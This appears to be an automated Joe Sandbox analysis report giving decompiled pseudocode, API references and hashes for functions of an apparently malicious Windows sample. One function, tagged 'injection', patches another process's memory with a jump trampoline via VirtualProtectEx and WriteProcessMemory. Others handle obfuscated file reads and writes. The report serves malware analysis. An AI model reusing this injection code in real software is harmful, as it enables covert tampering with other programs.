String ID: ObtainUserAgentString$urlmon.dll
API String ID: 145871493-2685262326
Opcode ID: b589a408d5a5be801c1de056e7f1d6ad7d750c00c8b0f05ac90fc583106492f4
Instruction ID: 700a51a4c2f5ca30fa7156db5aa61f6170ec8ec6a9eadf31e2aeb83d7e40dc3d
Opcode Fuzzy Hash: b589a408d5a5be801c1de056e7f1d6ad7d750c00c8b0f05ac90fc583106492f4
Instruction Fuzzy Hash: 7D018FB1D11219ABDB219BACEDC89DDBAB8AB04350F6005ADE752F3180DA348B44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012B830C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E012B830C(char _a4, char _a8) {
				_Unknown_base(*)()* _t8;
				intOrPtr _t13;
				struct HINSTANCE__* _t14;

				_t13 = 0;
				_t14 = LoadLibraryA("imagehlp.dll");
				if(_t14 != 0) {
					_t8 = GetProcAddress(_t14, "CheckSumMappedFile");
					if(_t8 != 0) {
						_push( &_a8);
						_push( &_a4);
						_push(_a8);
						_push(_a4);
						if( *_t8() != 0) {
							_t13 = _a8;
						}
					}
					FreeLibrary(_t14);
				}
				return _t13;
			}

0x012b8316
0x012b831e
0x012b8322
0x012b832a
0x012b8332
0x012b8337
0x012b833b
0x012b833c
0x012b833f
0x012b8346
0x012b8348
0x012b8348
0x012b8346
0x012b834c
0x012b834c
0x012b8357

APIs

LoadLibraryA.KERNEL32(imagehlp.dll), ref: 012B8318
GetProcAddress.KERNEL32(00000000,CheckSumMappedFile), ref: 012B832A
FreeLibrary.KERNEL32(00000000), ref: 012B834C

Strings

imagehlp.dll, xrefs: 012B8311
CheckSumMappedFile, xrefs: 012B8324

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CheckSumMappedFile$imagehlp.dll
API String ID: 145871493-2656424995
Opcode ID: 6877d9aade37d746533141d6273ea812f97c11bec95b004d35b8eece51c957d4
Instruction ID: a488db762feb3a961ebb0c7a5eb6fe3a690bcb777c784c450267035328bbf139
Opcode Fuzzy Hash: 6877d9aade37d746533141d6273ea812f97c11bec95b004d35b8eece51c957d4
Instruction Fuzzy Hash: 9EF0A0372121167797215F9AEC48CDE3B1CEF847A03098024FF198A110DF34D601C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 012BD982 Relevance: 7.6, APIs: 5, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E012BD982(WCHAR* __ecx, signed int __edx, long _a4) {
				char _v5;
				signed int _v12;
				void _v20;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				long _t29;
				void* _t30;
				signed int _t32;
				int _t39;
				int _t40;
				signed int _t42;
				int _t43;
				int _t46;
				intOrPtr _t47;
				long _t52;
				signed int _t60;
				struct _OVERLAPPED* _t65;
				WCHAR* _t68;
				void** _t69;

				_t60 = __edx;
				_v12 = __edx;
				_t2 =  &_v12;
				 *_t2 = _v12 & 0x00000001;
				_t68 = __ecx;
				_t29 = 0x80000000;
				_v5 = 0;
				if( *_t2 == 0) {
					_push(3);
				} else {
					_t29 = 0xc0000000;
					_push(4);
				}
				_pop(_t52);
				_t65 = 0;
				_t30 = CreateFileW(_t68, _t29, 1, 0, _t52, 0x80, 0);
				_t69 = _a4;
				 *_t69 = _t30;
				if(_t30 != 0xffffffff) {
					_push(_t47);
					_t32 = L012B19FB(_t30);
					_v36 = _t32;
					_v32 = _t60;
					if((_t32 & _t60) == 0xffffffff) {
						L7:
						CloseHandle( *_t69);
						 *_t69 =  *_t69 | 0xffffffff;
					} else {
						if((_t32 | _t60) == 0) {
							L22:
							_v5 = 1;
							L012B1645(_t47, _t69);
						} else {
							_v28 = 0;
							_v24 = 0;
							if(ReadFile( *_t69,  &_v20, 5,  &_a4, 0) != 0) {
								while(1) {
									__eflags = _a4 - _t65;
									if(_a4 == _t65) {
										goto L22;
									}
									__eflags = _a4 - 5;
									if(_a4 != 5) {
										L19:
										__eflags = _v12 - _t65;
										if(_v12 == _t65) {
											goto L7;
										} else {
											_t39 = L012B1703( *_t69, 0, _v28, _v24);
											__eflags = _t39;
											if(_t39 == 0) {
												goto L7;
											} else {
												_t40 = SetEndOfFile( *_t69);
												__eflags = _t40;
												if(_t40 == 0) {
													goto L7;
												} else {
													goto L22;
												}
											}
										}
									} else {
										_t42 = _v20 ^ _t69[4];
										asm("adc edi, [ebp-0x14]");
										_t47 = _t42 + _v28 + 5;
										asm("adc edi, ecx");
										_v20 = _t42;
										__eflags = 0 - _v32;
										if(__eflags > 0) {
											L18:
											_t65 = 0;
											__eflags = 0;
											goto L19;
										} else {
											if(__eflags < 0) {
												L14:
												__eflags = _t42 - 0xa00000;
												if(_t42 > 0xa00000) {
													goto L18;
												} else {
													_t43 = L012B1703( *_t69, 1, _t42, 0);
													__eflags = _t43;
													if(_t43 == 0) {
														goto L7;
													} else {
														_v28 = _t47;
														_v24 = 0;
														_t46 = ReadFile( *_t69,  &_v20, 5,  &_a4, 0);
														__eflags = _t46;
														if(_t46 != 0) {
															_t65 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L7;
														}
													}
												}
											} else {
												__eflags = _t47 - _v36;
												if(_t47 > _v36) {
													goto L18;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L23;
								}
								goto L22;
							} else {
								goto L7;
							}
						}
					}
					L23:
				}
				return _v5;
			}

0x012bd982
0x012bd989
0x012bd98c
0x012bd98c
0x012bd991
0x012bd993
0x012bd998
0x012bd99c
0x012bd9a7
0x012bd99e
0x012bd99e
0x012bd9a3
0x012bd9a3
0x012bd9a9
0x012bd9aa
0x012bd9b8
0x012bd9be
0x012bd9c1
0x012bd9c6
0x012bd9cc
0x012bd9cf
0x012bd9d8
0x012bd9db
0x012bd9e1
0x012bda08
0x012bda0a
0x012bda10
0x012bd9e3
0x012bd9e5
0x012bdab8
0x012bdaba
0x012bdabe
0x012bd9eb
0x012bd9f8
0x012bd9fb
0x012bda06
0x012bda1a
0x012bda1a
0x012bda1d
0x00000000
0x00000000
0x012bda23
0x012bda27
0x012bda88
0x012bda88
0x012bda8b
0x00000000
0x012bda91
0x012bda9b
0x012bdaa0
0x012bdaa2
0x00000000
0x012bdaa8
0x012bdaaa
0x012bdab0
0x012bdab2
0x00000000
0x00000000
0x00000000
0x00000000
0x012bdab2
0x012bdaa2
0x012bda29
0x012bda2c
0x012bda38
0x012bda3b
0x012bda3e
0x012bda40
0x012bda43
0x012bda46
0x012bda86
0x012bda86
0x012bda86
0x00000000
0x012bda48
0x012bda48
0x012bda4f
0x012bda4f
0x012bda54
0x00000000
0x012bda56
0x012bda5d
0x012bda62
0x012bda64
0x00000000
0x012bda66
0x012bda74
0x012bda77
0x012bda7a
0x012bda80
0x012bda82
0x012bda18
0x012bda18
0x00000000
0x012bda84
0x00000000
0x012bda84
0x012bda82
0x012bda64
0x012bda4a
0x012bda4a
0x012bda4d
0x00000000
0x00000000
0x00000000
0x00000000
0x012bda4d
0x012bda48
0x012bda46
0x00000000
0x012bda27
0x00000000
0x00000000
0x00000000
0x00000000
0x012bda06
0x012bd9e5
0x012bdac3
0x012bdac3
0x012bdaca

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012BD9B8
ReadFile.KERNEL32(00000001,?,00000005,00000001,00000000,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012BD9FE
CloseHandle.KERNEL32(00000001,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012BDA0A
ReadFile.KERNEL32(00000001,?,00000005,00000005,00000000,?,00000000,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012BDA7A
SetEndOfFile.KERNEL32(00000001,?,?,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012BDAAA

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: File$Read$CloseCreateHandle
String ID:
API String ID: 1724936099-0
Opcode ID: 70ce66275235e8e6906c4f01653f51f52493e8e1761ae44ab4585ec3c72dd7ae
Instruction ID: 82f0896b1a1cf300bdc2a9d275ad3332e5380ba7cd2e83b0d27b79791c77c40a
Opcode Fuzzy Hash: 70ce66275235e8e6906c4f01653f51f52493e8e1761ae44ab4585ec3c72dd7ae
Instruction Fuzzy Hash: 2641C73192420AAFEB24DFA8DCC4BFEBBF9BF88394F184119E651A7180C7715581CB55

Uniqueness

Uniqueness Score: -1.00%

Function 012B814C Relevance: 7.6, APIs: 5, Instructions: 112
injectionCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E012B814C(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				void* _v8;
				long _v12;
				DWORD* _v16;
				intOrPtr _v51;
				void _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t45;
				void* _t59;
				void* _t64;
				intOrPtr* _t65;
				long _t66;
				DWORD* _t67;
				void* _t69;

				_t62 = __edx;
				_t60 = __ecx;
				_t64 = __ecx;
				_t59 = __edx;
				_t67 = 0;
				_v8 = __ecx;
				_v16 = 0;
				if(E012B8102(__edx, __ecx) < 0x1e || VirtualProtectEx(__ecx, __edx, 0x1e, 0x40,  &_v12) == 0) {
					L17:
					return _v16;
				} else {
					L012B15F5( &_v52,  &_v52, 0xffffff90, 0x23);
					if(ReadProcessMemory(_t64, _t59,  &_v52, 0x1e, 0) == 0) {
						L16:
						VirtualProtectEx(_v8, _t59, 0x1e, _v12,  &_v12);
						goto L17;
					} else {
						_t65 =  &_v52;
						_push(0);
						_push(_t65);
						while(1) {
							_t45 = E012D3000(_t59, _t60, _t62, _t65, _t67);
							if(_t45 == 0xffffffff) {
								break;
							}
							_t67 = _t67 + _t45;
							if(_t67 > 0x1e) {
								goto L16;
							}
							_t60 =  *_t65;
							if(_t60 == 0xe9 || _t60 == 0xe8) {
								if(_t45 == 5) {
									 *((intOrPtr*)(_t65 + 1)) =  *((intOrPtr*)(_t65 + 1)) + _t59 - _a8;
								}
							}
							_push(0);
							if(_t67 >= 5) {
								_t13 = _t67 + 5; // 0x5
								_t66 = _t13;
								 *((intOrPtr*)(_t69 + _t67 - 0x2f)) = _t59 - _a8 - 5;
								 *((char*)(_t69 + _t67 - 0x30)) = 0xe9;
								if(WriteProcessMemory(_v8, _a8,  &_v52, _t66, ??) != 0) {
									_v52 = 0xe9;
									_v51 = _a4 - _t59 - 5;
									_a12();
									if(WriteProcessMemory(_v8, _t59,  &_v52, 5, 0) != 0) {
										_v16 = _t66;
									}
								}
								goto L16;
							}
							_t65 = _t69 + _t67 - 0x30;
							_push(_t65);
						}
						goto L16;
					}
				}
			}

0x012b814c
0x012b814c
0x012b8155
0x012b8157
0x012b8159
0x012b815e
0x012b8161
0x012b816c
0x012b825d
0x012b8264
0x012b818a
0x012b8192
0x012b81a8
0x012b824a
0x012b8257
0x00000000
0x012b81ae
0x012b81ae
0x012b81b1
0x012b81b4
0x012b81e7
0x012b81e7
0x012b81ef
0x00000000
0x00000000
0x012b81b7
0x012b81bc
0x00000000
0x00000000
0x012b81c2
0x012b81c7
0x012b81d1
0x012b81d8
0x012b81d8
0x012b81d1
0x012b81db
0x012b81e0
0x012b81f8
0x012b81f8
0x012b81fe
0x012b820a
0x012b821c
0x012b822b
0x012b822f
0x012b8232
0x012b8245
0x012b8247
0x012b8247
0x012b8245
0x00000000
0x012b821c
0x012b81e2
0x012b81e6
0x012b81e6
0x00000000
0x012b81f1
0x012b81a8

APIs

Part of subcall function 012B8102: VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 012B8118

VirtualProtectEx.KERNEL32(?,?,0000001E,00000040,?), ref: 012B817C
ReadProcessMemory.KERNEL32(?,?,?,0000001E,00000000,?,00000090,00000023,?,?,0000001E,00000040,?), ref: 012B81A0
WriteProcessMemory.KERNEL32(?,?,?,00000005,00000000,?,00000000,?,?,?,0000001E,00000000,?,00000090,00000023), ref: 012B8218
WriteProcessMemory.KERNEL32(?,?,000000E9,00000005,00000000,?,?,?,0000001E,00000000,?,00000090,00000023,?,?,0000001E), ref: 012B8241
VirtualProtectEx.KERNEL32(?,?,0000001E,?,?,?,?,?,0000001E,00000000,?,00000090,00000023,?,?,0000001E), ref: 012B8257

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
String ID:
API String ID: 390532180-0
Opcode ID: 69638ddfe2e40966b5633254269e4cccc5443a520956f80d5cd4acf1508fba50
Instruction ID: 1a23429d4d1a36c7979cd0a0a4a48746b783e35e39c927491448d7d7889ce0b5
Opcode Fuzzy Hash: 69638ddfe2e40966b5633254269e4cccc5443a520956f80d5cd4acf1508fba50
Instruction Fuzzy Hash: F431A271920209BBEF209EADDD88EEEBBBCEF45790F044625FA15E6180C770D9018B60

Uniqueness

Uniqueness Score: -1.00%

Function 012BDACD Relevance: 7.6, APIs: 5, Instructions: 91
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E012BDACD(void** __ecx, signed int __edx, void* __edi, signed int _a4) {
				char _v5;
				long _v12;
				void* _v16;
				void _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t26;
				signed int _t30;
				long _t46;
				signed int _t53;
				void** _t59;

				_t53 = __edx;
				_v16 = __edx;
				_t59 = __ecx;
				_v5 = 0;
				if(_a4 <= 0xa00000) {
					_t26 = L012B1B8B( *__ecx);
					_v40 = _t26;
					_v36 = _t53;
					if((_t26 & _t53) != 0xffffffff) {
						_push(2);
						if(SetFilePointerEx( *__ecx, 0, 0, 0) != 0) {
							_t30 = L012B1B8B( *_t59);
							_v32 = _t30;
							_v28 = _t53;
							if((_t30 & _t53) != 0xffffffff) {
								L012B15F5( &_v24,  &_v24, 0, 5);
								_v24 = _t59[4] ^ _a4;
								if(WriteFile( *_t59,  &_v24, 5,  &_v12, 0) == 0 || _v12 != 5) {
									L9:
									L012B1703( *_t59, 0, _v32, _v28);
									SetEndOfFile( *_t59);
								} else {
									_t46 = _a4;
									if(WriteFile( *_t59, _v16, _t46,  &_v12, 0) == 0 || _v12 != _t46) {
										goto L9;
									} else {
										_v5 = 1;
									}
								}
							}
							FlushFileBuffers( *_t59);
							L012B1703( *_t59, 0, _v40, _v36);
						}
					}
				}
				return _v5;
			}

0x012bdacd
0x012bdade
0x012bdae1
0x012bdae3
0x012bdae6
0x012bdaee
0x012bdaf3
0x012bdaf8
0x012bdafe
0x012bdb06
0x012bdb16
0x012bdb1e
0x012bdb23
0x012bdb28
0x012bdb2e
0x012bdb38
0x012bdb4a
0x012bdb5d
0x012bdb84
0x012bdb8e
0x012bdb95
0x012bdb65
0x012bdb66
0x012bdb77
0x00000000
0x012bdb7e
0x012bdb7e
0x012bdb7e
0x012bdb77
0x012bdb9b
0x012bdb9e
0x012bdbae
0x012bdbae
0x012bdb16
0x012bdafe
0x012bdbb9

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 012BDB0E
WriteFile.KERNEL32(?,?,00000005,00A00000,00000000,?,00000000,00000005), ref: 012BDB59
WriteFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000005,00A00000,00000000,?,00000000,00000005), ref: 012BDB73
SetEndOfFile.KERNEL32(?,?,?,?,?,00000005,00A00000,00000000,?,00000000,00000005), ref: 012BDB95
FlushFileBuffers.KERNEL32 ref: 012BDB9E

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: File$Write$BuffersFlushPointer
String ID:
API String ID: 848727363-0
Opcode ID: ea0eb6e29bfe26f1ccc92aa136a690c45b19a8e607d38636a94b2035d647906a
Instruction ID: 6d7e00d23a3798ed2dfcba745764b86e3476c7a69fd821aa0bd9b30db8ec7e37
Opcode Fuzzy Hash: ea0eb6e29bfe26f1ccc92aa136a690c45b19a8e607d38636a94b2035d647906a
Instruction Fuzzy Hash: DD314D7591020EEFDB24DFE8D8C4EEEBBB9EF48394F108529E641A6150E7359941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 012C6660 Relevance: 7.6, APIs: 5, Instructions: 84
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012C6660(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v32;
				void _v360;
				short _v880;
				void* _t26;
				long _t38;
				void* _t41;
				void* _t43;
				long _t53;

				_v16 = __edx;
				_t41 = 0x2c;
				L012B1479(_t41,  &_v32);
				if(L012B1203( &_v880, __ecx,  &_v32) == 0) {
					L11:
					return 1;
				}
				_t26 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
				_v8 = _t26;
				if(_t26 == 0xffffffff) {
					goto L11;
				}
				_t43 = 0x31;
				_t38 = 0;
				L012B165E(_t43,  &_v360);
				if(WriteFile(_v8,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
					L9:
					FlushFileBuffers(_v8);
					CloseHandle(_v8);
					if(_t38 == 0) {
						L012B1640( &_v880);
					}
					goto L11;
				} else {
					if(_v16 == 0) {
						L7:
						_t38 = 1;
						goto L9;
					}
					_t53 = L012B1BE0(_v16);
					if(WriteFile(_v8, _v16, _t53,  &_v12, 0) == 0 || _v12 != _t53) {
						_t38 = 0;
						goto L9;
					} else {
						goto L7;
					}
				}
			}

0x012c666c
0x012c6674
0x012c6675
0x012c668d
0x012c6747
0x012c674b
0x012c674b
0x012c66ac
0x012c66b2
0x012c66b8
0x00000000
0x00000000
0x012c66c8
0x012c66c9
0x012c66cb
0x012c66ef
0x012c6724
0x012c6727
0x012c6730
0x012c673a
0x012c6742
0x012c6742
0x00000000
0x012c66f6
0x012c66fa
0x012c671e
0x012c671e
0x00000000
0x012c671e
0x012c6706
0x012c6717
0x012c6722
0x00000000
0x00000000
0x00000000
0x00000000
0x012c6717

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?), ref: 012C66AC
WriteFile.KERNEL32(?,?,00000146,?,00000000), ref: 012C66EB
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 012C6713
FlushFileBuffers.KERNEL32(?), ref: 012C6727
CloseHandle.KERNEL32(?), ref: 012C6730

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: File$Write$BuffersCloseCreateFlushHandle
String ID:
API String ID: 873259163-0
Opcode ID: dcc5b790b7364224774fd91cec87a72631e1538f7253dfa257eeaac0ecc1b1a8
Instruction ID: ed701369524d1fc80b17662b39062e34dc188d2cfa38bbdc3f02e4c071f965a8
Opcode Fuzzy Hash: dcc5b790b7364224774fd91cec87a72631e1538f7253dfa257eeaac0ecc1b1a8
Instruction Fuzzy Hash: B521AD71D10119FBDF259AA4EC48FEE7BB8EF40790F1441A6E610A6194EB319A08CF50

Uniqueness

Uniqueness Score: -1.00%

Function 012C36A2 Relevance: 7.6, APIs: 5, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E012C36A2(void* __esi, void* __eflags) {
				char _v84;
				char _v344;
				char _v604;
				char _v864;
				short _v1384;
				short _v1904;
				char _v3044;
				void* _t51;
				void* _t54;
				void* _t56;
				void* _t69;

				_t69 = __eflags;
				L012B15E6(1,  &_v1904);
				PathRemoveFileSpecW( &_v1904);
				_t51 = 2;
				L012B15E6(_t51,  &_v1384);
				PathRemoveFileSpecW( &_v1384);
				 *0x12dc738 =  *0x12dc738 | 0x00000002;
				E012C3307();
				L012B146A();
				L012B196F( &_v1904, _t69);
				L012B196F( &_v1384, _t69);
				_t54 = 3;
				L012B15E6(_t54,  &_v864);
				L012B1681(0x80000001,  &_v864);
				CharToOemW( &_v1904,  &_v604);
				CharToOemW( &_v1384,  &_v344);
				_t56 = 8;
				L012B165E(_t56,  &_v84);
				_push( &_v344);
				_push( &_v604);
				_push( &_v344);
				if(L012B1BA9( &_v3044, 0x474,  &_v84,  &_v604) > 0) {
					L012B1087( &_v3044);
				}
				if( *0x12dcc58 == 0xffffffff) {
					ExitProcess(0);
				}
				return 1;
			}

0x012c36a2
0x012c36b5
0x012c36c7
0x012c36d1
0x012c36d2
0x012c36de
0x012c36e0
0x012c36e7
0x012c36ec
0x012c36f7
0x012c3702
0x012c370f
0x012c3710
0x012c3720
0x012c3739
0x012c3749
0x012c3750
0x012c3751
0x012c375c
0x012c3763
0x012c376a
0x012c378d
0x012c3795
0x012c3795
0x012c37a1
0x012c37a5
0x012c37a5
0x012c37ae

APIs

PathRemoveFileSpecW.SHLWAPI(?), ref: 012C36C7
PathRemoveFileSpecW.SHLWAPI(?), ref: 012C36DE

Part of subcall function 012C3307: SetEvent.KERNEL32(012C36EC), ref: 012C330D
Part of subcall function 012C3307: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012C3320

CharToOemW.USER32 ref: 012C3739
CharToOemW.USER32 ref: 012C3749
ExitProcess.KERNEL32 ref: 012C37A5

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CharFilePathRemoveSpec$EventExitObjectProcessSingleWait
String ID:
API String ID: 57584400-0
Opcode ID: bda0151d10958ff56ad605f7208639ce34346c618bcc03cff509328f633b9450
Instruction ID: d62f0e9d782bc97ed027b87d5c2589c3bc3393ec4b35657629fdaac562663264
Opcode Fuzzy Hash: bda0151d10958ff56ad605f7208639ce34346c618bcc03cff509328f633b9450
Instruction Fuzzy Hash: E9219472C1062D9ACB20E7A0ED94EEE737CEB14351F0046D69509A7084EF74AB88CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012C299C Relevance: 7.6, APIs: 5, Instructions: 71
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012C299C(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v104;
				char _v204;
				short _v724;
				void* _t14;
				intOrPtr _t18;
				long _t27;
				void* _t43;
				void* _t55;

				L012B1654(_t14);
				SetThreadPriority(GetCurrentThread(), 0);
				_t18 = L012B1780(0x19367402, 1);
				_v12 = _t18;
				if(_t18 != 0) {
					L012B137F(0xff220829,  &_v204, 0);
					L012B15E6(1,  &_v724);
					PathQuoteSpacesW( &_v724);
					_v8 = L012B18B6( &_v724);
					if(L012B150A() == 0) {
						L7:
						L012B1492(_v12);
						return 0;
					}
					_t43 = 4;
					L012B1479(_t43,  &_v104);
					_t55 = WaitForSingleObject;
					_t27 = WaitForSingleObject( *0x12dcc54, 0xc8);
					while(_t27 == 0x102) {
						L012B14D3( &_v204,  &_v724, _v8);
						_t27 = WaitForSingleObject( *0x12dcc54, 0xc8);
					}
					L012B1488(_t55);
					goto L7;
				}
				return _t18 + 1;
			}

0x012c29a7
0x012c29b5
0x012c29c2
0x012c29c7
0x012c29cc
0x012c29e1
0x012c29ef
0x012c29fb
0x012c2a0c
0x012c2a16
0x012c2a74
0x012c2a77
0x00000000
0x012c2a7c
0x012c2a20
0x012c2a21
0x012c2a26
0x012c2a38
0x012c2a66
0x012c2a58
0x012c2a64
0x012c2a64
0x012c2a6c
0x00000000
0x012c2a73
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 012C29AE
SetThreadPriority.KERNEL32(00000000), ref: 012C29B5
PathQuoteSpacesW.SHLWAPI(?,00000000), ref: 012C29FB
WaitForSingleObject.KERNEL32(000000C8), ref: 012C2A38

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

